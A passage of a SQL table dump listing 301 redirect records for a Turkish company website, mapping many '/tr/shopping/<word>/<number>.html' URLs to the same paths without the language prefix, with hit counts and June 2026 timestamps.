00:00:00',301),(76249,'https://3s-technologies.com.tr/tr/shopping/vexillar/2063811166.html',NULL,'https://3s-technologies.com.tr/shopping/vexillar/2063811166.html','',1,0,'2026-06-11 08:44:10','0000-00-00 00:00:00',301),(76250,'https://3s-technologies.com.tr/tr/shopping/martyniaceae/2000124399.html',NULL,'https://3s-technologies.com.tr/shopping/martyniaceae/2000124399.html','',1,0,'2026-06-11 08:44:14','0000-00-00 00:00:00',301),(76251,'https://3s-technologies.com.tr/tr/shopping/spinosus/3250761838.html',NULL,'https://3s-technologies.com.tr/shopping/spinosus/3250761838.html','',1,0,'2026-06-11 08:44:17','0000-00-00 00:00:00',301),(76252,'https://3s-technologies.com.tr/tr/shopping/norwegian/898171132.html',NULL,'https://3s-technologies.com.tr/shopping/norwegian/898171132.html','',1,0,'2026-06-11 08:44:20','0000-00-00 00:00:00',301),(76253,'https://3s-technologies.com.tr/tr/shopping/provoked/3200654160.html',NULL,'https://3s-technologies.com.tr/shopping/provoked/3200654160.html','',1,0,'2026-06-11 08:44:23','0000-00-00 00:00:00',301),(76254,'https://3s-technologies.com.tr/tr/shopping/puppies/150389189.html',NULL,'https://3s-technologies.com.tr/shopping/puppies/150389189.html','',1,0,'2026-06-11 08:44:26','0000-00-00 00:00:00',301),(76255,'https://3s-technologies.com.tr/tr/shopping/insolently/3471426255.html',NULL,'https://3s-technologies.com.tr/shopping/insolently/3471426255.html','',1,0,'2026-06-11 08:44:29','0000-00-00 00:00:00',301),(76256,'https://3s-technologies.com.tr/tr/shopping/peplum/3643059911.html',NULL,'https://3s-technologies.com.tr/shopping/peplum/3643059911.html','',1,0,'2026-06-11 08:44:31','0000-00-00 00:00:00',301),(76257,'https://3s-technologies.com.tr/tr/shopping/resorb/3007451649.html',NULL,'https://3s-technologies.com.tr/shopping/resorb/3007451649.html','',1,0,'2026-06-11 08:44:36','0000-00-00 00:00:00',301),(76258,'https://3s-technologies.com.tr/tr/shopping/dilection/2573157338.html',NULL,'https://3s-technologies.com.tr/shopping/dilection/2573157338.html','',1,0,'2026-06-11 08:44:38','0000-00-00 00:00:00',301),(76259,'https://3s-technologies.com.tr/tr/shopping/articulative/4079168535.html',NULL,'https://3s-technologies.com.tr/shopping/articulative/4079168535.html','',1,0,'2026-06-11 08:44:41','0000-00-00 00:00:00',301),(76260,'https://3s-technologies.com.tr/tr/shopping/papillary/3167153415.html',NULL,'https://3s-technologies.com.tr/shopping/papillary/3167153415.html','',1,0,'2026-06-11 08:44:44','0000-00-00 00:00:00',301),(76261,'https://3s-technologies.com.tr/tr/shopping/untimely/1316858680.html',NULL,'https://3s-technologies.com.tr/shopping/untimely/1316858680.html','',1,0,'2026-06-11 08:44:47','0000-00-00 00:00:00',301),(76262,'https://3s-technologies.com.tr/tr/shopping/formosissima/7989064.html',NULL,'https://3s-technologies.com.tr/shopping/formosissima/7989064.html','',1,0,'2026-06-11 08:44:50','0000-00-00 00:00:00',301),(76263,'https://3s-technologies.com.tr/tr/shopping/elation/927797628.html',NULL,'https://3s-technologies.com.tr/shopping/elation/927797628.html','',1,0,'2026-06-11 08:44:53','0000-00-00 00:00:00',301),(76264,'https://3s-technologies.com.tr/tr/shopping/endoskeleton/553443430.html',NULL,'https://3s-technologies.com.tr/shopping/endoskeleton/553443430.html','',1,0,'2026-06-11 08:44:56','0000-00-00 00:00:00',301),(76265,'https://3s-technologies.com.tr/tr/shopping/friese/3735647910.html',NULL,'https://3s-technologies.com.tr/shopping/friese/3735647910.html','',1,0,'2026-06-11 08:44:59','0000-00-00 00:00:00',301),(76266,'https://3s-technologies.com.tr/tr/shopping/weism/3894861101.html',NULL,'https://3s-technologies.com.tr/shopping/weism/3894861101.html','',1,0,'2026-06-11 08:45:02','0000-00-00 00:00:00',301),(76267,'https://3s-technologies.com.tr/tr/shopping/morulae/2485587984.html',NULL,'https://3s-technologies.com.tr/shopping/morulae/2485587984.html','',1,0,'2026-06-11 08:45:05','0000-00-00 00:00:00',301),(76268,'https://3s-technologies.com.tr/tr/shopping/proletaneous/739023102.html',NULL,'https://3s-technologies.com.tr/shopping/proletaneous/739023102.html','',1,0,'2026-06-11 08:45:08','0000-00-00 00:00:00',301),(76269,'https://3s-technologies.com.tr/tr/shopping/basigynium/2402899288.html',NULL,'https://3s-technologies.com.tr/shopping/basigynium/2402899288.html','',1,0,'2026-06-11 08:45:11','0000-00-00 00:00:00',301),(76270,'https://3s-technologies.com.tr/tr/shopping/subdural/640676888.html',NULL,'https://3s-technologies.com.tr/shopping/subdural/640676888.html','',1,0,'2026-06-11 08:45:14','0000-00-00 00:00:00',301),(76271,'https://3s-technologies.com.tr/tr/shopping/manor/463759720.html',NULL,'https://3s-technologies.com.tr/shopping/manor/463759720.html','',1,0,'2026-06-11 08:45:17','0000-00-00 00:00:00',301),(76272,'https://3s-technologies.com.tr/tr/shopping/granulate/1582642711.html',NULL,'https://3s-technologies.com.tr/shopping/granulate/1582642711.html','',1,0,'2026-06-11 08:45:20','0000-00-00 00:00:00',301),(76273,'https://3s-technologies.com.tr/tr/shopping/virgularia/3531736333.html',NULL,'https://3s-technologies.com.tr/shopping/virgularia/3531736333.html','',1,0,'2026-06-11 08:45:25','0000-00-00 00:00:00',301),(76274,'https://3s-technologies.com.tr/tr/shopping/sterquilinous/3080200581.html',NULL,'https://3s-technologies.com.tr/shopping/sterquilinous/3080200581.html','',1,0,'2026-06-11 08:45:27','0000-00-00 00:00:00',301),(76275,'https://3s-technologies.com.tr/tr/shopping/lycopersicum/3680703082.html',NULL,'https://3s-technologies.com.tr/shopping/lycopersicum/3680703082.html','',1,0,'2026-06-11 08:45:30','0000-00-00 00:00:00',301),(76276,'https://3s-technologies.com.tr/tr/shopping/laramie/3985432157.html',NULL,'https://3s-technologies.com.tr/shopping/laramie/3985432157.html','',1,0,'2026-06-11 08:45:33','0000-00-00 00:00:00',301),(76277,'https://3s-technologies.com.tr/tr/shopping/clannagael/3108668375.html',NULL,'https://3s-technologies.com.tr/shopping/clannagael/3108668375.html','',1,0,'2026-06-11 08:45:36','0000-00-00 00:00:00',301),(76278,'https://3s-technologies.com.tr/tr/shopping/mezzotintoed/118121575.html',NULL,'https://3s-technologies.com.tr/shopping/mezzotintoed/118121575.html','',1,0,'2026-06-11 08:45:39','0000-00-00 00:00:00',301),(76279,'https://3s-technologies.com.tr/tr/shopping/babingtonite/509207581.html',NULL,'https://3s-technologies.com.tr/shopping/babingtonite/509207581.html','',1,0,'2026-06-11 08:45:42','0000-00-00 00:00:00',301),(76280,'https://3s-technologies.com.tr/tr/shopping/advertiser/2478797714.html',NULL,'https://3s-technologies.com.tr/shopping/advertiser/2478797714.html','',1,0,'2026-06-11 08:45:45','0000-00-00 00:00:00',301),(76281,'https://3s-technologies.com.tr/tr/shopping/skirl/1092051837.html',NULL,'https://3s-technologies.com.tr/shopping/skirl/1092051837.html','',1,0,'2026-06-11 08:45:48','0000-00-00 00:00:00',301),(76282,'https://3s-technologies.com.tr/tr/shopping/begohm/4216816365.html',NULL,'https://3s-technologies.com.tr/shopping/begohm/4216816365.html','',1,0,'2026-06-11 08:45:51','0000-00-00 00:00:00',301),(76283,'https://3s-technologies.com.tr/tr/shopping/huntsman/261287469.html',NULL,'https://3s-technologies.com.tr/shopping/huntsman/261287469.html','',1,0,'2026-06-11 08:45:54','0000-00-00 00:00:00',301),(76284,'https://3s-technologies.com.tr/tr/shopping/metalliferous/4228763465.html',NULL,'https://3s-technologies.com.tr/shopping/metalliferous/4228763465.html','',1,0,'2026-06-11 08:45:57','0000-00-00 00:00:00',301),(76285,'https://3s-technologies.com.tr/tr/shopping/greensand/1799239234.html',NULL,'https://3s-technologies.com.tr/shopping/greensand/1799239234.html','',1,0,'2026-06-11 08:46:00','0000-00-00 00:00:00',301),(76286,'https://3s-technologies.com.tr/tr/shopping/holywater/4291283541.html',NULL,'https://3s-technologies.com.tr/shopping/holywater/4291283541.html','',1,0,'2026-06-11 08:46:03','0000-00-00 00:00:00',301),(76287,'https://3s-technologies.com.tr/tr/shopping/parturifacient/3197113948.html',NULL,'https://3s-technologies.com.tr/shopping/parturifacient/3197113948.html','',1,0,'2026-06-11 08:46:06','0000-00-00 00:00:00',301),(76288,'https://3s-technologies.com.tr/tr/shopping/hylozoist/758805074.html',NULL,'https://3s-technologies.com.tr/shopping/hylozoist/758805074.html','',1,0,'2026-06-11 08:46:09','0000-00-00 00:00:00',301),(76289,'https://3s-technologies.com.tr/tr/shopping/octoyl/2237023815.html',NULL,'https://3s-technologies.com.tr/shopping/octoyl/2237023815.html','',1,0,'2026-06-11 08:46:13','0000-00-00 00:00:00',301),(76290,'https://3s-technologies.com.tr/tr/shopping/revolutive/2254542392.html',NULL,'https://3s-technologies.com.tr/shopping/revolutive/2254542392.html','',1,0,'2026-06-11 08:46:15','0000-00-00 00:00:00',301),(76291,'https://3s-technologies.com.tr/tr/shopping/cannoneer/1068033163.html',NULL,'https://3s-technologies.com.tr/shopping/cannoneer/1068033163.html','',1,0,'2026-06-11 08:46:23','0000-00-00 00:00:00',301),(76292,'https://3s-technologies.com.tr/tr/shopping/consanguineal/28723527.html',NULL,'https://3s-technologies.com.tr/shopping/consanguineal/28723527.html','',1,0,'2026-06-11 08:46:25','0000-00-00 00:00:00',301),(76293,'https://3s-technologies.com.tr/tr/shopping/citraconic/2881643529.html',NULL,'https://3s-technologies.com.tr/shopping/citraconic/2881643529.html','',1,0,'2026-06-11 08:46:28','0000-00-00 00:00:00',301),(76294,'https://3s-technologies.com.tr/tr/shopping/stephanomeria/3036756539.html',NULL,'https://3s-technologies.com.tr/shopping/stephanomeria/3036756539.html','',1,0,'2026-06-11 08:46:31','0000-00-00 00:00:00',301),(76295,'https://3s-technologies.com.tr/tr/shopping/youthsome/2474208926.html',NULL,'https://3s-technologies.com.tr/shopping/youthsome/2474208926.html','',1,0,'2026-06-11 08:46:34','0000-00-00 00:00:00',301),(76296,'https://3s-technologies.com.tr/tr/shopping/chiliarchy/4107097819.html',NULL,'https://3s-technologies.com.tr/shopping/chiliarchy/4107097819.html','',1,0,'2026-06-11 08:46:37','0000-00-00 00:00:00',301),(76297,'https://3s-technologies.com.tr/tr/shopping/mantelshelf/1261913868.html',NULL,'https://3s-technologies.com.tr/shopping/mantelshelf/1261913868.html','',1,0,'2026-06-11 08:46:40','0000-00-00 00:00:00',301),(76298,'https://3s-technologies.com.tr/tr/shopping/morphemics/1745241962.html',NULL,'https://3s-technologies.com.tr/shopping/morphemics/1745241962.html','',1,0,'2026-06-11 08:46:43','0000-00-00 00:00:00',301),(76299,'https://3s-technologies.com.tr/tr/shopping/pehlevi/2163768738.html',NULL,'https://3s-technologies.com.tr/shopping/pehlevi/2163768738.html','',1,0,'2026-06-11 08:46:46','0000-00-00 00:00:00',301),(76300,'https://3s-technologies.com.tr/tr/shopping/prosobranchiata/1431350553.html',NULL,'https://3s-technologies.com.tr/shopping/prosobranchiata/1431350553.html','',1,0,'2026-06-11 08:46:49','0000-00-00 00:00:00',301),(76301,'https://3s-technologies.com.tr/tr/shopping/postpalatine/2650658597.html',NULL,'https://3s-technologies.com.tr/shopping/postpalatine/2650658597.html','',1,0,'2026-06-11 08:46:52','0000-00-00 00:00:00',301),(76302,'https://3s-technologies.com.tr/tr/shopping/diatribist/3093132569.html',NULL,'https://3s-technologies.com.tr/shopping/diatribist/3093132569.html','',1,0,'2026-06-11 08:46:55','0000-00-00 00:00:00',301),(76303,'https://3s-technologies.com.tr/tr/shopping/manicurist/366646653.html',NULL,'https://3s-technologies.com.tr/shopping/manicurist/366646653.html','',1,0,'2026-06-11 08:46:58','0000-00-00 00:00:00',301),(76304,'https://3s-technologies.com.tr/tr/shopping/woodchuck/3324883672.html',NULL,'https://3s-technologies.com.tr/shopping/woodchuck/3324883672.html','',1,0,'2026-06-11 08:47:01','0000-00-00 00:00:00',301),(76305,'https://3s-technologies.com.tr/tr/shopping/hindoostanee/2662212780.html',NULL,'https://3s-technologies.com.tr/shopping/hindoostanee/2662212780.html','',1,0,'2026-06-11 08:47:04','0000-00-00 00:00:00',301),(76306,'https://3s-technologies.com.tr/tr/shopping/monoculous/3773927020.html',NULL,'https://3s-technologies.com.tr/shopping/monoculous/3773927020.html','',1,0,'2026-06-11 08:47:07','0000-00-00 00:00:00',301),(76307,'https://3s-technologies.com.tr/tr/shopping/insurmountable/43208037.html',NULL,'https://3s-technologies.com.tr/shopping/insurmountable/43208037.html','',1,0,'2026-06-11 08:47:12','0000-00-00 00:00:00',301),(76308,'https://3s-technologies.com.tr/tr/shopping/liveliness/2551820645.html',NULL,'https://3s-technologies.com.tr/shopping/liveliness/2551820645.html','',1,0,'2026-06-11 08:47:14','0000-00-00 00:00:00',301),(76309,'https://3s-technologies.com.tr/tr/shopping/mahon/3934790574.html',NULL,'https://3s-technologies.com.tr/shopping/mahon/3934790574.html','',1,0,'2026-06-11 08:47:24','0000-00-00 00:00:00',301),(76310,'https://3s-technologies.com.tr/tr/shopping/collied/2187594347.html',NULL,'https://3s-technologies.com.tr/shopping/collied/2187594347.html','',1,0,'2026-06-11 08:47:27','0000-00-00 00:00:00',301),(76311,'https://3s-technologies.com.tr/tr/shopping/scuta/391684345.html',NULL,'https://3s-technologies.com.tr/shopping/scuta/391684345.html','',1,0,'2026-06-11 08:47:45','0000-00-00 00:00:00',301),(76312,'https://3s-technologies.com.tr/tr/shopping/cucumbers/3576217365.html',NULL,'https://3s-technologies.com.tr/shopping/cucumbers/3576217365.html','',1,0,'2026-06-11 08:47:47','0000-00-00 00:00:00',301),(76313,'https://3s-technologies.com.tr/tr/shopping/arrant/534850239.html',NULL,'https://3s-technologies.com.tr/shopping/arrant/534850239.html','',1,0,'2026-06-11 08:48:04','0000-00-00 00:00:00',301),(76314,'https://3s-technologies.com.tr/tr/shopping/addressing/4005881061.html',NULL,'https://3s-technologies.com.tr/shopping/addressing/4005881061.html','',1,0,'2026-06-11 08:48:07','0000-00-00 00:00:00',301),(76315,'https://3s-technologies.com.tr/tr/shopping/scrambled/1073387688.html',NULL,'https://3s-technologies.com.tr/shopping/scrambled/1073387688.html','',1,0,'2026-06-11 08:48:17','0000-00-00 00:00:00',301),(76316,'https://3s-technologies.com.tr/tr/shopping/hemerobius/2065625479.html',NULL,'https://3s-technologies.com.tr/shopping/hemerobius/2065625479.html','',1,0,'2026-06-11 08:48:20','0000-00-00 00:00:00',301),(76317,'https://3s-technologies.com.tr/tr/shopping/pointal/3937214756.html',NULL,'https://3s-technologies.com.tr/shopping/pointal/3937214756.html','',1,0,'2026-06-11 08:48:26','0000-00-00 00:00:00',301),(76318,'https://3s-technologies.com.tr/tr/shopping/orchitis/3085555138.html',NULL,'https://3s-technologies.com.tr/shopping/orchitis/3085555138.html','',1,0,'2026-06-11 08:48:28','0000-00-00 00:00:00',301),(76319,'https://3s-technologies.com.tr/tr/shopping/muniment/3865302904.html',NULL,'https://3s-technologies.com.tr/shopping/muniment/3865302904.html','',1,0,'2026-06-11 08:48:56','0000-00-00 00:00:00',301),(76320,'https://3s-technologies.com.tr/tr/shopping/biyearly/3355115134.html',NULL,'https://3s-technologies.com.tr/shopping/biyearly/3355115134.html','',1,0,'2026-06-11 08:49:19','0000-00-00 00:00:00',301),(76321,'https://3s-technologies.com.tr/tr/shopping/choctaws/1674703012.html',NULL,'https://3s-technologies.com.tr/shopping/choctaws/1674703012.html','',1,0,'2026-06-11 08:49:38','0000-00-00 00:00:00',301),(76322,'https://3s-technologies.com.tr/tr/shopping/pendentive/2687276542.html',NULL,'https://3s-technologies.com.tr/shopping/pendentive/2687276542.html','',1,0,'2026-06-11 08:50:22','0000-00-00 00:00:00',301),(76323,'https://3s-technologies.com.tr/tr/shopping/shamer/530097912.html',NULL,'https://3s-technologies.com.tr/shopping/shamer/530097912.html','',1,0,'2026-06-11 08:50:51','0000-00-00 00:00:00',301),(76324,'https://3s-technologies.com.tr/tr/shopping/laidly/2432579197.html',NULL,'https://3s-technologies.com.tr/shopping/laidly/2432579197.html','',1,0,'2026-06-11 08:51:41','0000-00-00 00:00:00',301),(76325,'https://3s-technologies.com.tr/tr/shopping/haematometer/4077792929.html',NULL,'https://3s-technologies.com.tr/shopping/haematometer/4077792929.html','',1,0,'2026-06-11 08:51:57','0000-00-00 00:00:00',301),(76326,'https://3s-technologies.com.tr/tr/shopping/pottain/710328081.html',NULL,'https://3s-technologies.com.tr/shopping/pottain/710328081.html','',1,0,'2026-06-11 08:52:01','0000-00-00 00:00:00',301),(76327,'https://3s-technologies.com.tr/tr/shopping/moate/4038148675.html',NULL,'https://3s-technologies.com.tr/shopping/moate/4038148675.html','',1,0,'2026-06-11 08:52:54','0000-00-00 00:00:00',301),(76328,'https://3s-technologies.com.tr/tr/shopping/hewed/716128952.html',NULL,'https://3s-technologies.com.tr/shopping/hewed/716128952.html','',1,0,'2026-06-11 08:53:20','0000-00-00 00:00:00',301),(76329,'https://3s-technologies.com.tr/tr/shopping/charnel/2474715071.html',NULL,'https://3s-technologies.com.tr/shopping/charnel/2474715071.html','',1,0,'2026-06-11 08:53:31','0000-00-00 00:00:00',301),(76330,'https://3s-technologies.com.tr/tr/shopping/willwiththewisp/234799726.html',NULL,'https://3s-technologies.com.tr/shopping/willwiththewisp/234799726.html','',1,0,'2026-06-11 08:54:16','0000-00-00 00:00:00',301),(76331,'https://3s-technologies.com.tr/tr/shopping/neoteric/1298291527.html',NULL,'https://3s-technologies.com.tr/shopping/neoteric/1298291527.html','',1,0,'2026-06-11 08:54:36','0000-00-00 00:00:00',301),(76332,'https://3s-technologies.com.tr/tr/shopping/recitative/103351538.html',NULL,'https://3s-technologies.com.tr/shopping/recitative/103351538.html','',1,0,'2026-06-11 08:55:22','0000-00-00 00:00:00',301),(76333,'https://3s-technologies.com.tr/tr/shopping/zebec/159120419.html',NULL,'https://3s-technologies.com.tr/shopping/zebec/159120419.html','',1,0,'2026-06-11 08:55:35','0000-00-00 00:00:00',301),(76334,'https://3s-technologies.com.tr/tr/shopping/mendicancy/3274683532.html',NULL,'https://3s-technologies.com.tr/shopping/mendicancy/3274683532.html','',1,0,'2026-06-11 08:55:48','0000-00-00 00:00:00',301),(76335,'https://3s-technologies.com.tr/tr/shopping/exposer/3476780796.html',NULL,'https://3s-technologies.com.tr/shopping/exposer/3476780796.html','',1,0,'2026-06-11 08:56:42','0000-00-00 00:00:00',301),(76336,'https://3s-technologies.com.tr/tr/shopping/longitudinal/1255381384.html',NULL,'https://3s-technologies.com.tr/shopping/longitudinal/1255381384.html','',1,0,'2026-06-11 08:57:21','0000-00-00 00:00:00',301),(76337,'https://3s-technologies.com.tr/tr/shopping/commeasure/3838321532.html',NULL,'https://3s-technologies.com.tr/shopping/commeasure/3838321532.html','',1,0,'2026-06-11 08:57:24','0000-00-00 00:00:00',301),(76338,'https://3s-technologies.com.tr/tr/shopping/beauteously/4276391792.html',NULL,'https://3s-technologies.com.tr/shopping/beauteously/4276391792.html','',1,0,'2026-06-11 08:57:27','0000-00-00 00:00:00',301),(76339,'https://3s-technologies.com.tr/tr/shopping/clandestinely/3272137606.html',NULL,'https://3s-technologies.com.tr/shopping/clandestinely/3272137606.html','',1,0,'2026-06-11 08:57:30','0000-00-00 00:00:00',301),(76340,'https://3s-technologies.com.tr/tr/shopping/ventriloquize/454296925.html',NULL,'https://3s-technologies.com.tr/shopping/ventriloquize/454296925.html','',1,0,'2026-06-11 08:57:32','0000-00-00 00:00:00',301),(76341,'https://3s-technologies.com.tr/tr/shopping/grammar/538179732.html',NULL,'https://3s-technologies.com.tr/shopping/grammar/538179732.html','',1,0,'2026-06-11 08:57:36','0000-00-00 00:00:00',301),(76342,'https://3s-technologies.com.tr/tr/shopping/hydrological/587328608.html',NULL,'https://3s-technologies.com.tr/shopping/hydrological/587328608.html','',1,0,'2026-06-11 08:57:38','0000-00-00 00:00:00',301),(76343,'https://3s-technologies.com.tr/tr/shopping/physicologist/2758245317.html',NULL,'https://3s-technologies.com.tr/shopping/physicologist/2758245317.html','',1,0,'2026-06-11 08:57:42','0000-00-00 00:00:00',301),(76344,'https://3s-technologies.com.tr/tr/shopping/global/515652509.html',NULL,'https://3s-technologies.com.tr/shopping/global/515652509.html','',1,0,'2026-06-11 08:57:45','0000-00-00 00:00:00',301),(76345,'https://3s-technologies.com.tr/tr/shopping/least/3913773596.html',NULL,'https://3s-technologies.com.tr/shopping/least/3913773596.html','',1,0,'2026-06-11 08:57:47','0000-00-00 00:00:00',301),(76346,'https://3s-technologies.com.tr/tr/shopping/iridizing/2988253919.html',NULL,'https://3s-technologies.com.tr/shopping/iridizing/2988253919.html','',1,0,'2026-06-11 08:57:51','0000-00-00 00:00:00',301),(76347,'https://3s-technologies.com.tr/tr/shopping/dwarfs/1189270419.html',NULL,'https://3s-technologies.com.tr/shopping/dwarfs/1189270419.html','',1,0,'2026-06-11 08:57:53','0000-00-00 00:00:00',301),(76348,'https://3s-technologies.com.tr/tr/shopping/pledge/381347212.html',NULL,'https://3s-technologies.com.tr/shopping/pledge/381347212.html','',1,0,'2026-06-11 08:57:56','0000-00-00 00:00:00',301),(76349,'https://3s-technologies.com.tr/tr/shopping/cespitine/3337601460.html',NULL,'https://3s-technologies.com.tr/shopping/cespitine/3337601460.html','',1,0,'2026-06-11 08:58:00','0000-00-00 00:00:00',301),(76350,'https://3s-technologies.com.tr/tr/shopping/claimed/1892343216.html',NULL,'https://3s-technologies.com.tr/shopping/claimed/1892343216.html','',1,0,'2026-06-11 08:58:03','0000-00-00 00:00:00',301),(76351,'https://3s-technologies.com.tr/tr/shopping/copyer/659631194.html',NULL,'https://3s-technologies.com.tr/shopping/copyer/659631194.html','',1,0,'2026-06-11 08:58:06','0000-00-00 00:00:00',301),(76352,'https://3s-technologies.com.tr/tr/shopping/austringer/911659576.html',NULL,'https://3s-technologies.com.tr/shopping/austringer/911659576.html','',1,0,'2026-06-11 08:58:09','0000-00-00 00:00:00',301),(76353,'https://3s-technologies.com.tr/tr/shopping/anthocopa/2050131500.html',NULL,'https://3s-technologies.com.tr/shopping/anthocopa/2050131500.html','',1,0,'2026-06-11 08:58:12','0000-00-00 00:00:00',301),(76354,'https://3s-technologies.com.tr/tr/shopping/chickling/633983633.html',NULL,'https://3s-technologies.com.tr/shopping/chickling/633983633.html','',1,0,'2026-06-11 08:58:15','0000-00-00 00:00:00',301),(76355,'https://3s-technologies.com.tr/tr/shopping/avulse/1000963390.html',NULL,'https://3s-technologies.com.tr/shopping/avulse/1000963390.html','',1,0,'2026-06-11 08:58:17','0000-00-00 00:00:00',301),(76356,'https://3s-technologies.com.tr/tr/shopping/limosum/1290162543.html',NULL,'https://3s-technologies.com.tr/shopping/limosum/1290162543.html','',1,0,'2026-06-11 08:58:22','0000-00-00 00:00:00',301),(76357,'https://3s-technologies.com.tr/tr/shopping/michaelmas/2507209896.html',NULL,'https://3s-technologies.com.tr/shopping/michaelmas/2507209896.html','',1,0,'2026-06-11 08:58:25','0000-00-00 00:00:00',301),(76358,'https://3s-technologies.com.tr/tr/shopping/majorat/542890232.html',NULL,'https://3s-technologies.com.tr/shopping/majorat/542890232.html','',1,0,'2026-06-11 08:58:28','0000-00-00 00:00:00',301),(76359,'https://3s-technologies.com.tr/tr/shopping/goodly/2636238805.html',NULL,'https://3s-technologies.com.tr/shopping/goodly/2636238805.html','',1,0,'2026-06-11 08:58:31','0000-00-00 00:00:00',301),(76360,'https://3s-technologies.com.tr/tr/shopping/concentering/2723585902.html',NULL,'https://3s-technologies.com.tr/shopping/concentering/2723585902.html','',1,0,'2026-06-11 08:58:34','0000-00-00 00:00:00',301),(76361,'https://3s-technologies.com.tr/tr/shopping/cedrine/422454641.html',NULL,'https://3s-technologies.com.tr/shopping/cedrine/422454641.html','',1,0,'2026-06-11 08:58:37','0000-00-00 00:00:00',301),(76362,'https://3s-technologies.com.tr/tr/shopping/matriculation/1112337234.html',NULL,'https://3s-technologies.com.tr/shopping/matriculation/1112337234.html','',1,0,'2026-06-11 08:58:40','0000-00-00 00:00:00',301),(76363,'https://3s-technologies.com.tr/tr/shopping/lardy/2244989308.html',NULL,'https://3s-technologies.com.tr/shopping/lardy/2244989308.html','',1,0,'2026-06-11 08:58:43','0000-00-00 00:00:00',301),(76364,'https://3s-technologies.com.tr/tr/shopping/arbitress/3604597590.html',NULL,'https://3s-technologies.com.tr/shopping/arbitress/3604597590.html','',1,0,'2026-06-11 08:58:46','0000-00-00 00:00:00',301),(76365,'https://3s-technologies.com.tr/tr/shopping/craftsmen/80032058.html',NULL,'https://3s-technologies.com.tr/shopping/craftsmen/80032058.html','',1,0,'2026-06-11 08:58:49','0000-00-00 00:00:00',301),(76366,'https://3s-technologies.com.tr/tr/shopping/welldraining/1668954667.html',NULL,'https://3s-technologies.com.tr/shopping/welldraining/1668954667.html','',1,0,'2026-06-11 08:58:52','0000-00-00 00:00:00',301),(76367,'https://3s-technologies.com.tr/tr/shopping/multisulcate/1417629076.html',NULL,'https://3s-technologies.com.tr/shopping/multisulcate/1417629076.html','',1,0,'2026-06-11 08:58:55','0000-00-00 00:00:00',301),(76368,'https://3s-technologies.com.tr/tr/shopping/waler/1881603280.html',NULL,'https://3s-technologies.com.tr/shopping/waler/1881603280.html','',1,0,'2026-06-11 08:58:58','0000-00-00 00:00:00',301),(76369,'https://3s-technologies.com.tr/tr/shopping/lither/3323225243.html',NULL,'https://3s-technologies.com.tr/shopping/lither/3323225243.html','',1,0,'2026-06-11 08:59:01','0000-00-00 00:00:00',301),(76370,'https://3s-technologies.com.tr/tr/shopping/hieratic/4037985168.html',NULL,'https://3s-technologies.com.tr/shopping/hieratic/4037985168.html','',1,0,'2026-06-11 08:59:04','0000-00-00 00:00:00',301),(76371,'https://3s-technologies.com.tr/tr/shopping/unbosoming/2516387488.html',NULL,'https://3s-technologies.com.tr/shopping/unbosoming/2516387488.html','',1,0,'2026-06-11 08:59:07','0000-00-00 00:00:00',301),(76372,'https://3s-technologies.com.tr/tr/shopping/aristocratism/3470979893.html',NULL,'https://3s-technologies.com.tr/shopping/aristocratism/3470979893.html','',1,0,'2026-06-11 08:59:10','0000-00-00 00:00:00',301),(76373,'https://3s-technologies.com.tr/tr/shopping/orchestrion/705739293.html',NULL,'https://3s-technologies.com.tr/shopping/orchestrion/705739293.html','',1,0,'2026-06-11 08:59:13','0000-00-00 00:00:00',301),(76374,'https://3s-technologies.com.tr/tr/shopping/radde/3322013128.html',NULL,'https://3s-technologies.com.tr/shopping/radde/3322013128.html','',1,0,'2026-06-11 08:59:16','0000-00-00 00:00:00',301),(76375,'https://3s-technologies.com.tr/tr/shopping/incontestability/4281102276.html',NULL,'https://3s-technologies.com.tr/shopping/incontestability/4281102276.html','',1,0,'2026-06-11 08:59:19','0000-00-00 00:00:00',301),(76376,'https://3s-technologies.com.tr/tr/shopping/suddenly/1483740041.html',NULL,'https://3s-technologies.com.tr/shopping/suddenly/1483740041.html','',1,0,'2026-06-11 08:59:22','0000-00-00 00:00:00',301),(76377,'https://3s-technologies.com.tr/tr/shopping/discipled/442259520.html',NULL,'https://3s-technologies.com.tr/shopping/discipled/442259520.html','',1,0,'2026-06-11 08:59:25','0000-00-00 00:00:00',301),(76378,'https://3s-technologies.com.tr/tr/shopping/flintiest/1091441968.html',NULL,'https://3s-technologies.com.tr/shopping/flintiest/1091441968.html','',1,0,'2026-06-11 08:59:28','0000-00-00 00:00:00',301),(76379,'https://3s-technologies.com.tr/tr/shopping/kythe/49008940.html',NULL,'https://3s-technologies.com.tr/shopping/kythe/49008940.html','',1,0,'2026-06-11 08:59:31','0000-00-00 00:00:00',301),(76380,'https://3s-technologies.com.tr/tr/shopping/vanity/1047298700.html',NULL,'https://3s-technologies.com.tr/shopping/vanity/1047298700.html','',1,0,'2026-06-11 08:59:34','0000-00-00 00:00:00',301),(76381,'https://3s-technologies.com.tr/tr/shopping/ratskeller/397648755.html',NULL,'https://3s-technologies.com.tr/shopping/ratskeller/397648755.html','',1,0,'2026-06-11 08:59:37','0000-00-00 00:00:00',301),(76382,'https://3s-technologies.com.tr/tr/shopping/elfishly/2948231942.html',NULL,'https://3s-technologies.com.tr/shopping/elfishly/2948231942.html','',1,0,'2026-06-11 08:59:40','0000-00-00 00:00:00',301),(76383,'https://3s-technologies.com.tr/tr/shopping/meritmonger/990488329.html',NULL,'https://3s-technologies.com.tr/shopping/meritmonger/990488329.html','',1,0,'2026-06-11 08:59:43','0000-00-00 00:00:00',301),(76384,'https://3s-technologies.com.tr/tr/shopping/scatteredly/4115870860.html',NULL,'https://3s-technologies.com.tr/shopping/scatteredly/4115870860.html','',1,0,'2026-06-11 08:59:46','0000-00-00 00:00:00',301),(76385,'https://3s-technologies.com.tr/tr/shopping/eloinment/964654030.html',NULL,'https://3s-technologies.com.tr/shopping/eloinment/964654030.html','',1,0,'2026-06-11 08:59:51','0000-00-00 00:00:00',301),(76386,'https://3s-technologies.com.tr/tr/shopping/contagious/1945213743.html',NULL,'https://3s-technologies.com.tr/shopping/contagious/1945213743.html','',1,0,'2026-06-11 08:59:54','0000-00-00 00:00:00',301),(76387,'https://3s-technologies.com.tr/tr/shopping/mephitism/72993445.html',NULL,'https://3s-technologies.com.tr/shopping/mephitism/72993445.html','',1,0,'2026-06-11 08:59:57','0000-00-00 00:00:00',301),(76388,'https://3s-technologies.com.tr/tr/shopping/eschar/2606168178.html',NULL,'https://3s-technologies.com.tr/shopping/eschar/2606168178.html','',1,0,'2026-06-11 09:00:00','0000-00-00 00:00:00',301),(76389,'https://3s-technologies.com.tr/tr/shopping/hematoxylin/978536294.html',NULL,'https://3s-technologies.com.tr/shopping/hematoxylin/978536294.html','',1,0,'2026-06-11 09:00:03','0000-00-00 